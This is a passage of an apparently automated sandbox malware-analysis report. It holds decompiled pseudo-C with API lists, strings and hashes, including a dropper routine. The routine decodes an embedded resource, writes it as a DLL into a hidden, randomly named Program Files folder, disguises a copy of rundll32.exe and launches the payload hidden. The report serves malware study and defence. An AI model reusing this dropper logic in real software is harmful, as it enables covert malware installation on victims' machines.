                                                    				long _v8;
                                                    				long _v12;
                                                    				struct _MEMORY_BASIC_INFORMATION _v40;
                                                    				struct _SYSTEM_INFO _v76;
                                                    				void* _v88;
                                                    				void* _t11;
                                                    				int _t15;
                                                    				long _t17;
                                                    				void* _t18;
                                                    				void* _t25;
                                                    				void* _t34;
                                                    				void* _t37;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    
                                                    				_t11 = 4;
                                                    				E00415390(_t11, __ecx);
                                                    				_t34 = _t42;
                                                    				if(VirtualQuery(_t34,  &_v40, 0x1c) == 0) {
                                                    					L2:
                                                    					_t15 = 0;
                                                    				} else {
                                                    					_t37 = _v40.AllocationBase;
                                                    					GetSystemInfo( &_v76);
                                                    					_t17 = _v76.dwPageSize;
                                                    					_v8 = _t17;
                                                    					_t41 = ( !(_t17 - 1) & _t34) - _t17;
                                                    					_t18 = E004150B3();
                                                    					asm("sbb eax, eax");
                                                    					if(_t41 >= ( ~(_t18 - 1) & 0x00001000) + 0x11000 + _t37) {
                                                    						if(E004150B3() != 1) {
                                                    							if(_t41 > _t37) {
                                                    								VirtualFree(_t37, _t41 - _t37, 0x4000);
                                                    							}
                                                    							VirtualAlloc(_t41, _v8, 0x1000, 4);
                                                    						}
                                                    						_t25 = E004150B3();
                                                    						asm("sbb eax, eax");
                                                    						_t15 = VirtualProtect(_t41, _v8, ( ~(_t25 - 1) & 0x00000103) + 1,  &_v12);
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    				}
                                                    				return _t15;
                                                    			}


















                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00415019
                                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041502A
                                                      • Part of subcall function 004150B3: GetVersionExA.KERNEL32(?), ref: 004150E4
                                                    • VirtualFree.KERNEL32(?,?,00004000,?,?,0000001C), ref: 00415075
                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00415086
                                                    • VirtualProtect.KERNEL32(?,?,00000000,?,?,?,0000001C), ref: 004150A5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFreeInfoProtectQuerySystemVersion
                                                    • String ID:
                                                    • API String ID: 2795766573-0
                                                    • Opcode ID: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
                                                    • Instruction ID: 6d54ece17a00f09206e5511fc7c9e2413ccf1818c2fd634c5d4940529b78a55d
                                                    • Opcode Fuzzy Hash: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
                                                    • Instruction Fuzzy Hash: 61110B76A50A09EADB1167F0DD49FEF7F78EB4D385F100121FA01E3180D5389A4586D9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004150B3() {
                                                    				struct _OSVERSIONINFOA _v152;
                                                    				signed int _t6;
                                                    
                                                    				if(( *0x41c9bd & 0x00000001) == 0) {
                                                    					 *0x41c9bd =  *0x41c9bd | 0x00000001;
                                                    					 *0x41c9c0 =  *0x41c9c0 & 0x00000000;
                                                    					_v152.dwOSVersionInfoSize = 0x94;
                                                    					if(GetVersionExA( &_v152) != 0) {
                                                    						 *0x41c9c0 = _v152.dwPlatformId;
                                                    					}
                                                    					E0041536C(E004043CC);
                                                    				}
                                                    				_t6 =  *0x41c9c0; // 0x0
                                                    				return _t6;
                                                    			}






                                                    APIs
                                                    • GetVersionExA.KERNEL32(?), ref: 004150E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: 875cac5599071a03cf6d967225fbd84f2cf9bf561e0a438da5ca14a86c743399
                                                    • Instruction ID: 929566bd8b4077ec1c8b267c5b5c8a2ef05b37bc6fe8b5fd74154d79ce4bd554
                                                    • Opcode Fuzzy Hash: 875cac5599071a03cf6d967225fbd84f2cf9bf561e0a438da5ca14a86c743399
                                                    • Instruction Fuzzy Hash: 35E06DB199921897E710DB64ED89FD53BE8B744308F0090AAD908922D2D7B88889CB4E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 76%
                                                    			E004013BC() {
                                                    				long _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				long _v20;
                                                    				long _v24;
                                                    				void* _v39;
                                                    				void _v40;
                                                    				void* _v44;
                                                    				void* _v48;
                                                    				struct _STARTUPINFOA _v116;
                                                    				struct _PROCESS_INFORMATION _v132;
                                                    				char _v168;
                                                    				void _v427;
                                                    				char _v428;
                                                    				void _v687;
                                                    				char _v688;
                                                    				void _v947;
                                                    				char _v948;
                                                    				void _v1207;
                                                    				char _v1208;
                                                    				void _v1719;
                                                    				char _v1720;
                                                    				int _t108;
                                                    				void* _t136;
                                                    				signed int _t138;
                                                    				signed int _t139;
                                                    				void* _t177;
                                                    				signed int _t178;
                                                    				signed int _t193;
                                                    				signed int _t200;
                                                    				signed int _t201;
                                                    				signed int _t205;
                                                    				signed int _t209;
                                                    				signed int _t213;
                                                    				signed int _t214;
                                                    				signed int _t217;
                                                    				struct HRSRC__* _t218;
                                                    				signed int _t219;
                                                    				void* _t238;
                                                    				void* _t240;
                                                    				void* _t243;
                                                    				void* _t244;
                                                    				void* _t247;
                                                    
                                                    				_t218 = FindResourceA(0, 0x82, "GUI");
                                                    				if(_t218 == 0) {
                                                    					L2:
                                                    					return 0;
                                                    				}
                                                    				_t238 = LoadResource(0, _t218);
                                                    				if(_t238 != 0) {
                                                    					_t108 = SizeofResource(0, _t218);
                                                    					_v8 = _t108;
                                                    					memcpy(_t238, LockResource(_t238), _t108);
                                                    					_v16 =  *_t238 & 0x000000ff;
                                                    					_t244 = _t243 + 0xc;
                                                    					_t219 = 0;
                                                    					_v12 =  *(_t238 + 1) & 0x000000ff;
                                                    					if(_v8 <= 0) {
                                                    						L11:
                                                    						_t193 = 0x40;
                                                    						_v428 = 0;
                                                    						_push(0x40);
                                                    						memset( &_v427, 0, _t193 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v688 = 0;
                                                    						memset( &_v687, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v40 = 0;
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
                                                    						_t247 = _t244 + 0x2c;
                                                    						if(CreateDirectoryA( &_v428, 0) == 0) {
                                                    							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
                                                    							_t247 = _t247 + 0xc;
                                                    							CreateDirectoryA( &_v428, 0);
                                                    						}
                                                    						Sleep(0x64);
                                                    						SetFileAttributesA( &_v428, 2);
                                                    						memset( &_v40, 0, 0x10);
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
                                                    						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0);
                                                    						_v44 = _t136;
                                                    						WriteFile(_t136, _t238, _v8,  &_v24, 0);
                                                    						_t138 = rand();
                                                    						asm("cdq");
                                                    						_t139 = _t138 / 0xff;
                                                    						_t214 = _t138 % 0xff;
                                                    						_push(_t214);
                                                    						_v20 = _t214;
                                                    						L004151F6();
                                                    						_v48 = _t139;
                                                    						_t200 = _v20;
                                                    						if(_t200 <= 0) {
                                                    							L16:
                                                    							_t240 = _v44;
                                                    							WriteFile(_t240, _v48, _v20,  &_v24, 0);
                                                    							SetFilePointer(_t240, 0, 0, 0);
                                                    							WriteFile(_t240, "MZ", 2,  &_v24, 0);
                                                    							CloseHandle(_t240);
                                                    							_t201 = 8;
                                                    							memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t201 << 2);
                                                    							asm("movsw");
                                                    							_push(0x40);
                                                    							_v948 = 0;
                                                    							memset( &_v947, 0, 0 << 2);
                                                    							asm("stosw");
                                                    							asm("stosb");
                                                    							memset( &_v40, 0, 0x10);
                                                    							E0040107C( &_v40, 3);
                                                    							wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
                                                    							CopyFileA( &_v168,  &_v948, 0);
                                                    							_t205 = 0x7f;
                                                    							_v1720 = 0;
                                                    							_push(0x40);
                                                    							memset( &_v1719, 0, _t205 << 2);
                                                    							asm("stosw");
                                                    							asm("stosb");
                                                    							_v1208 = 0;
                                                    							memset( &_v1207, 0, 0 << 2);
                                                    							asm("stosw");
                                                    							asm("stosb");
                                                    							GetModuleFileNameA(0,  &_v1208, 0x104);
                                                    							wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
                                                    							_t209 = 0x10;
                                                    							memset( &(_v116.lpReserved), 0, _t209 << 2);
                                                    							_v116.cb = 0x44;
                                                    							_v116.lpDesktop = "WinSta0\\Default";
                                                    							_v116.wShowWindow = 0;
                                                    							CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132);
                                                    							_t177 = 1;
                                                    							return _t177;
                                                    						} else {
                                                    							_v12 = 0xfa;
                                                    							_v8 = _t139;
                                                    							_v12 = _v12 - _t139;
                                                    							_v16 = _t200;
                                                    							do {
                                                    								_t178 = rand();
                                                    								asm("cdq");
                                                    								_v8 = _v8 + 1;
                                                    								_t67 =  &_v16;
                                                    								 *_t67 = _v16 - 1;
                                                    								 *_v8 = _t178 % (_v12 + _v8);
                                                    							} while ( *_t67 != 0);
                                                    							goto L16;
                                                    						}
                                                    					} else {
                                                    						goto L4;
                                                    					}
                                                    					do {
                                                    						L4:
                                                    						asm("cdq");
                                                    						_t213 = 3;
                                                    						_t217 = _t219 % _t213;
                                                    						if(_t217 == 2) {
                                                    							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v16;
                                                    						}
                                                    						if(_t217 == 1) {
                                                    							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12;
                                                    						}
                                                    						if(_t217 == 0) {
                                                    							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12 + _v16;
                                                    						}
                                                    						_t219 = _t219 + 1;
                                                    					} while (_t219 < _v8);
                                                    					goto L11;
                                                    				}
                                                    				goto L2;
                                                    			}















































                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
                                                    • LockResource.KERNEL32(00000000,00000000), ref: 00401403
                                                    • memcpy.MSVCRT ref: 0040140B
                                                    • wsprintfA.USER32 ref: 004014B3
                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 004014C0
                                                    • wsprintfA.USER32 ref: 004014DA
                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 004014E7
                                                    • Sleep.KERNEL32(00000064), ref: 004014EF
                                                    • SetFileAttributesA.KERNEL32(?,00000002), ref: 004014FE
                                                    • memset.MSVCRT ref: 0040150B
                                                      • Part of subcall function 0040107C: GetTickCount.KERNEL32 ref: 00401095
                                                      • Part of subcall function 0040107C: srand.MSVCRT ref: 0040109C
                                                      • Part of subcall function 0040107C: rand.MSVCRT ref: 004010A9
                                                      • Part of subcall function 0040107C: rand.MSVCRT ref: 004010C1
                                                    • wsprintfA.USER32 ref: 00401532
                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040154E
                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401567
                                                    • rand.MSVCRT ref: 0040156F
                                                    • rand.MSVCRT ref: 0040159D
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004015C6
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004015CC
                                                    • WriteFile.KERNEL32(?,0041C0C8,00000002,?,00000000), ref: 004015DF
                                                    • CloseHandle.KERNEL32(?), ref: 004015E2
                                                    • memset.MSVCRT ref: 00401617
                                                    • wsprintfA.USER32 ref: 00401644
                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00401658
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401697
                                                    • wsprintfA.USER32 ref: 004016BE
                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004016F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: File$wsprintf$CreateResourcerand$Write$Directorymemset$AttributesCloseCopyCountFindHandleLoadLockModuleNamePointerProcessSizeofSleepTickmemcpysrand
                                                    • String ID: %s "%s",Hlink %s$%s\%s.dll$%s\%s.exe$D$GUI$WinSta0\Default$c:\Program Files\%s$c:\windows\system32\rundll32.exe$d:\Program Files\%s
                                                    • API String ID: 3207154250-826311432
                                                    • Opcode ID: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
                                                    • Instruction ID: ac8b8aeebc4711bad355f370068009a7f956b33eb2c00d030ca5656be22452af
                                                    • Opcode Fuzzy Hash: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
                                                    • Instruction Fuzzy Hash: 5DA18DB2A4021CBFDB11DBA4CD85EDEBBBCAB48304F1044A6F245B7191DA749F848B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 44%
                                                    			E00401B41(void* __ecx, void* __edx, long long __fp0) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				char* _t229;
                                                    				char* _t247;
                                                    				signed int _t253;
                                                    				intOrPtr* _t256;
                                                    				char* _t258;
                                                    				signed int _t261;
                                                    				char* _t285;
                                                    				signed int _t292;
                                                    				char* _t303;
                                                    				void* _t304;
                                                    				signed int _t310;
                                                    				signed int _t312;
                                                    				char* _t317;
                                                    				void* _t320;
                                                    				void* _t335;
                                                    				void* _t342;
                                                    				void* _t365;
                                                    				signed int _t380;
                                                    				void* _t382;
                                                    				signed int _t389;
                                                    				intOrPtr* _t401;
                                                    				char* _t402;
                                                    				char* _t403;
                                                    				char* _t404;
                                                    				void* _t405;
                                                    				signed int _t410;
                                                    				intOrPtr* _t414;
                                                    				char* _t415;
                                                    				void* _t418;
                                                    				void* _t420;
                                                    				long long* _t421;
                                                    				long long* _t424;
                                                    				void* _t426;
                                                    				long long* _t427;
                                                    				long long _t430;
                                                    
                                                    				_t430 = __fp0;
                                                    				L004153D0();
                                                    				_t421 = _t420 - 0x18c;
                                                    				_t229 =  *(_t418 + 8);
                                                    				_t320 = __ecx;
                                                    				if(_t229 != 0x1b) {
                                                    					__eflags = _t229 - 0x74;
                                                    					if(_t229 != 0x74) {
                                                    						__eflags = _t229 - 0x75;
                                                    						if(_t229 != 0x75) {
                                                    							__eflags = _t229 - 0x76;
                                                    							if(_t229 == 0x76) {
                                                    								_push(1);
                                                    								L00415334();
                                                    								_push(0x41c994);
                                                    								L004152E6();
                                                    								 *(_t418 + 8) = 0x82;
                                                    								__eflags =  *(__ecx + 0x6c);
                                                    								if( *(__ecx + 0x6c) != 0) {
                                                    									 *(_t418 + 8) = 0x83;
                                                    								}
                                                    								__eflags =  *(_t320 + 0x70);
                                                    								if( *(_t320 + 0x70) != 0) {
                                                    									_t149 = _t418 + 8;
                                                    									 *_t149 =  *(_t418 + 8) | 0x00000004;
                                                    									__eflags =  *_t149;
                                                    								}
                                                    								__eflags =  *(_t320 + 0x74);
                                                    								if( *(_t320 + 0x74) != 0) {
                                                    									_t152 = _t418 + 8;
                                                    									 *_t152 =  *(_t418 + 8) | 0x00000008;
                                                    									__eflags =  *_t152;
                                                    								}
                                                    								_t401 =  *0x417298;
                                                    								 *(_t418 - 0x18) =  *_t401();
                                                    								asm("fild dword [ebp-0x18]");
                                                    								 *(_t418 - 0x14) =  *(_t320 + 0x60);
                                                    								 *((long long*)(_t418 - 0x58)) = _t430;
                                                    								 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
                                                    								 *0x417230(0);
                                                    								 *0x417234( *(_t418 - 0x14), strlen( *(_t418 - 0x14)));
                                                    								 *(_t418 - 4) = 0x10;
                                                    								E00402534(_t418 - 0x198);
                                                    								 *((intOrPtr*)(_t418 - 0x198)) = 0x417660;
                                                    								 *(_t418 - 4) = 0x12;
                                                    								 *0x417230(1, _t418 - 0x28,  *(_t418 + 8), 0);
                                                    								 *((intOrPtr*)(_t418 - 0x3c)) = 0;
                                                    								 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    								 *((intOrPtr*)(_t418 - 0x38)) = 0;
                                                    								 *((intOrPtr*)(_t418 - 0x34)) = 0;
                                                    								 *(_t418 + 8) =  *(_t320 + 0x68);
                                                    								 *(_t418 - 4) = 0x13;
                                                    								 *((char*)(_t418 - 0x74)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    								 *0x417230(0);
                                                    								 *0x417234( *(_t418 + 8), strlen( *(_t418 + 8)));
                                                    								 *(_t418 - 4) = 0x14;
                                                    								_t247 = E004028AC(_t418 - 0x198, _t418 - 0x74, _t418 - 0x40, 0, 0, 0xffffffff);
                                                    								__eflags = _t247;
                                                    								 *(_t418 - 0x44) = _t247;
                                                    								if(_t247 > 0) {
                                                    									 *(_t418 + 8) = 0;
                                                    									 *(_t418 - 0x14) = _t247;
                                                    									do {
                                                    										_t253 =  *((intOrPtr*)(_t418 - 0x3c)) +  *(_t418 + 8);
                                                    										 *(_t418 - 0x18) = _t253;
                                                    										 *((char*)(_t418 - 0x8c)) =  *_t253;
                                                    										 *0x417230(0);
                                                    										_t256 =  *0x41723c; // 0x6cd05df0
                                                    										 *0x417240( *(_t418 - 0x18), 0,  *_t256);
                                                    										_t258 =  *(_t418 - 0x88);
                                                    										 *(_t418 - 4) = 0x15;
                                                    										__eflags = _t258;
                                                    										if(_t258 == 0) {
                                                    											_t258 =  *0x417238; // 0x6cd06082
                                                    										}
                                                    										L0041532E();
                                                    										L0041532E();
                                                    										 *(_t418 - 4) = 0x14;
                                                    										 *0x417230(1, "\r\n---------------------------------------------\r\n", _t258);
                                                    										 *(_t418 + 8) =  &(( *(_t418 + 8))[0x10]);
                                                    										_t207 = _t418 - 0x14;
                                                    										 *_t207 =  *(_t418 - 0x14) - 1;
                                                    										__eflags =  *_t207;
                                                    									} while ( *_t207 != 0);
                                                    								}
                                                    								 *(_t418 + 8) =  *_t401();
                                                    								_t335 = _t418 - 0x10;
                                                    								asm("fild dword [ebp+0x8]");
                                                    								 *((long long*)(_t418 - 0x50)) = _t430;
                                                    								L004152EC();
                                                    								 *(_t418 - 4) = 0x16;
                                                    								 *_t421 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x58));
                                                    								L00415328();
                                                    								L00415322();
                                                    								L0041531C();
                                                    								L00415334();
                                                    								 *(_t418 - 4) = 0x14;
                                                    								L00415214();
                                                    								 *(_t418 - 4) = 0x13;
                                                    								 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x10), _t418 - 0x10, 0x41c128, _t335, _t335,  *(_t418 - 0x44));
                                                    								 *(_t418 - 4) = 0x12;
                                                    								E00402408(_t418 - 0x40);
                                                    								_t224 = _t418 - 4;
                                                    								 *_t224 =  *(_t418 - 4) | 0xffffffff;
                                                    								__eflags =  *_t224;
                                                    								_t342 = _t418 - 0x198;
                                                    								goto L45;
                                                    							}
                                                    						} else {
                                                    							_push(1);
                                                    							L00415334();
                                                    							_push(0x41c994);
                                                    							L004152E6();
                                                    							 *(_t418 + 8) = 0x82;
                                                    							__eflags =  *(__ecx + 0x6c);
                                                    							if( *(__ecx + 0x6c) != 0) {
                                                    								 *(_t418 + 8) = 0x83;
                                                    							}
                                                    							__eflags =  *(_t320 + 0x70);
                                                    							if( *(_t320 + 0x70) != 0) {
                                                    								_t85 = _t418 + 8;
                                                    								 *_t85 =  *(_t418 + 8) | 0x00000004;
                                                    								__eflags =  *_t85;
                                                    							}
                                                    							__eflags =  *(_t320 + 0x74);
                                                    							if(__eflags != 0) {
                                                    								_t88 = _t418 + 8;
                                                    								 *_t88 =  *(_t418 + 8) | 0x00000008;
                                                    								__eflags =  *_t88;
                                                    							}
                                                    							_t414 =  *0x417298;
                                                    							_t261 =  *_t414();
                                                    							_t402 =  *(_t320 + 0x78);
                                                    							 *(_t418 - 0x18) = _t261;
                                                    							asm("fild dword [ebp-0x18]");
                                                    							 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
                                                    							 *((long long*)(_t418 - 0x48)) = _t430;
                                                    							 *0x417230(0);
                                                    							 *0x417234(_t402, strlen(_t402));
                                                    							_t403 =  *(_t320 + 0x60);
                                                    							 *(_t418 - 4) = 8;
                                                    							 *((char*)(_t418 - 0x9c)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    							 *0x417230(0);
                                                    							 *0x417234(_t403, strlen(_t403));
                                                    							 *(_t418 - 4) = 9;
                                                    							E004025A0(_t418 - 0x144, __eflags);
                                                    							 *((intOrPtr*)(_t418 - 0x144)) = 0x417660;
                                                    							 *(_t418 - 4) = 0xc;
                                                    							 *0x417230(1, _t418 - 0x9c, _t418 - 0x28,  *(_t418 + 8), 0);
                                                    							 *(_t418 - 4) = 0xb;
                                                    							 *0x417230(1);
                                                    							E004023AE(_t418 - 0xcc);
                                                    							_t404 =  *(_t320 + 0x68);
                                                    							 *(_t418 - 4) = 0xd;
                                                    							 *((char*)(_t418 - 0x60)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    							 *0x417230(0, _t418 + 0xb);
                                                    							 *0x417234(_t404, strlen(_t404));
                                                    							_push(0xffffffff);
                                                    							_push(0);
                                                    							_push(_t418 - 0xcc);
                                                    							 *(_t418 - 4) = 0xe;
                                                    							_push(_t418 - 0x60);
                                                    							_push(_t418 - 0x144);
                                                    							_t405 = E00402D2D(_t320, _t404, _t414);
                                                    							_t285 =  *(_t418 - 0x5c);
                                                    							_t424 = _t421 + 0x14;
                                                    							__eflags = _t285;
                                                    							if(_t285 == 0) {
                                                    								_t285 =  *0x417238; // 0x6cd06082
                                                    							}
                                                    							L004152E6();
                                                    							 *(_t418 - 0x18) =  *_t414(_t285);
                                                    							_t365 = _t418 - 0x14;
                                                    							asm("fild dword [ebp-0x18]");
                                                    							 *((long long*)(_t418 - 0x50)) = _t430;
                                                    							L004152EC();
                                                    							 *(_t418 - 4) = 0xf;
                                                    							 *_t424 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x48));
                                                    							L00415328();
                                                    							L00415322();
                                                    							L0041531C();
                                                    							L00415334();
                                                    							 *(_t418 - 4) = 0xe;
                                                    							L00415214();
                                                    							 *(_t418 - 4) = 0xd;
                                                    							 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x14), _t418 - 0x14, 0x41c104, _t365, _t365, _t405);
                                                    							 *(_t418 - 4) = 0xb;
                                                    							E004021A6(_t418 - 0xcc);
                                                    							 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
                                                    							_t342 = _t418 - 0x144;
                                                    							L45:
                                                    							_t229 = E00402269(_t342);
                                                    						}
                                                    					} else {
                                                    						_push(1);
                                                    						L00415334();
                                                    						_push(0x41c994);
                                                    						L004152E6();
                                                    						E004024EC(_t418 - 0x2c, _t418 + 0xb);
                                                    						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
                                                    						 *(_t418 - 0x10) = 0x82;
                                                    						__eflags =  *(__ecx + 0x6c);
                                                    						 *(_t418 - 4) = 0;
                                                    						if( *(__ecx + 0x6c) != 0) {
                                                    							 *(_t418 - 0x10) = 0x83;
                                                    						}
                                                    						__eflags =  *(_t320 + 0x70);
                                                    						if( *(_t320 + 0x70) != 0) {
                                                    							_t11 = _t418 - 0x10;
                                                    							 *_t11 =  *(_t418 - 0x10) | 0x00000004;
                                                    							__eflags =  *_t11;
                                                    						}
                                                    						__eflags =  *(_t320 + 0x74);
                                                    						if( *(_t320 + 0x74) != 0) {
                                                    							_t14 = _t418 - 0x10;
                                                    							 *_t14 =  *(_t418 - 0x10) | 0x00000008;
                                                    							__eflags =  *_t14;
                                                    						}
                                                    						_t292 =  *0x417298();
                                                    						_t415 =  *(_t320 + 0x60);
                                                    						 *(_t418 - 0x18) = _t292;
                                                    						asm("fild dword [ebp-0x18]");
                                                    						 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    						 *((long long*)(_t418 - 0x50)) = _t430;
                                                    						 *0x417230(0);
                                                    						 *0x417234(_t415, strlen(_t415));
                                                    						 *(_t418 - 4) = 1;
                                                    						E00402534(_t418 - 0xf0);
                                                    						 *((intOrPtr*)(_t418 - 0xf0)) = 0x417660;
                                                    						 *(_t418 - 4) = 3;
                                                    						 *0x417230(1, _t418 - 0x40,  *(_t418 - 0x10), 0);
                                                    						 *(_t418 - 0x18) =  *(_t418 - 0xe1);
                                                    						 *(_t418 - 0x10) = 0;
                                                    						_t303 = E00402CEB(_t418 - 0xf0, _t418 - 0x30,  *(_t320 + 0x68));
                                                    						_t426 = _t421 + 0xc;
                                                    						__eflags = _t303;
                                                    						if(_t303 == 0) {
                                                    							_t304 = 0x41cbc0;
                                                    						} else {
                                                    							_t304 = E00402504(_t418 - 0x2c, 0);
                                                    						}
                                                    						_t380 = 6;
                                                    						memcpy(_t418 - 0x7c, _t304, _t380 << 2);
                                                    						_t427 = _t426 + 0xc;
                                                    						asm("movsw");
                                                    						__eflags =  *((char*)(_t418 - 0x74));
                                                    						if( *((char*)(_t418 - 0x74)) != 0) {
                                                    							_t410 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								__eflags =  *(_t418 - 0x28);
                                                    								if( *(_t418 - 0x28) == 0) {
                                                    									goto L21;
                                                    								}
                                                    								_t310 =  *((intOrPtr*)(_t418 - 0x24)) -  *(_t418 - 0x28);
                                                    								_t389 = 0x1a;
                                                    								asm("cdq");
                                                    								__eflags = _t410 - _t310 / _t389;
                                                    								if(_t410 < _t310 / _t389) {
                                                    									_t312 = _t410;
                                                    									asm("cdq");
                                                    									__eflags = _t312 %  *(_t418 - 0x18) - 1;
                                                    									if(_t312 %  *(_t418 - 0x18) == 1) {
                                                    										 *(_t418 - 0x10) =  *(_t418 - 0x10) + 1;
                                                    										_push(_t418 - 0x74);
                                                    										_t317 =  *(E004022E2(E00402504(_t418 - 0x2c, _t410)) + 4);
                                                    										 *(_t418 - 4) = 6;
                                                    										__eflags = _t317;
                                                    										if(_t317 == 0) {
                                                    											_t317 =  *0x417238; // 0x6cd06082
                                                    										}
                                                    										L0041532E();
                                                    										 *(_t418 - 4) = 3;
                                                    										 *0x417230(1, _t317);
                                                    										_push("\r\n---------------------------------------------\r\n");
                                                    										L0041532E();
                                                    									}
                                                    									_t410 = _t410 + 1;
                                                    									continue;
                                                    								}
                                                    								goto L21;
                                                    							}
                                                    						}
                                                    						L21:
                                                    						 *(_t418 - 0x18) =  *0x417298();
                                                    						_t382 = _t418 - 0x14;
                                                    						asm("fild dword [ebp-0x18]");
                                                    						 *((long long*)(_t418 - 0x48)) = _t430;
                                                    						L004152EC();
                                                    						_push( *(_t418 - 0x10));
                                                    						_push(_t382);
                                                    						_push(_t382);
                                                    						 *(_t418 - 4) = 7;
                                                    						 *_t427 =  *((long long*)(_t418 - 0x48)) -  *((long long*)(_t418 - 0x50));
                                                    						_push(0x41c128);
                                                    						_push(_t418 - 0x14);
                                                    						L00415328();
                                                    						_push( *(_t418 - 0x14));
                                                    						_push(0x3ec);
                                                    						L00415322();
                                                    						L0041531C();
                                                    						_push(0);
                                                    						L00415334();
                                                    						 *(_t418 - 4) = 3;
                                                    						L00415214();
                                                    						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
                                                    						E00402269(_t418 - 0xf0);
